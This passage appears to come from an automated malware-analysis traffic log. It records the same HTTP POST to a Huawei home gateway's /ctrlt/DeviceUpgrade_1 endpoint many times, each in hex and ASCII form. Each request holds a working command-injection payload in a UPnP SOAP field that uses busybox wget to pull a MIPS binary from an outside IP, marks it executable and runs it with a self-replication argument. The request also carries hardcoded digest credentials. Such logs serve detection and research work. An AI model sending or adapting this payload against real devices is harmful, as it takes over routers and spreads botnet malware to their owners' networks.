78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 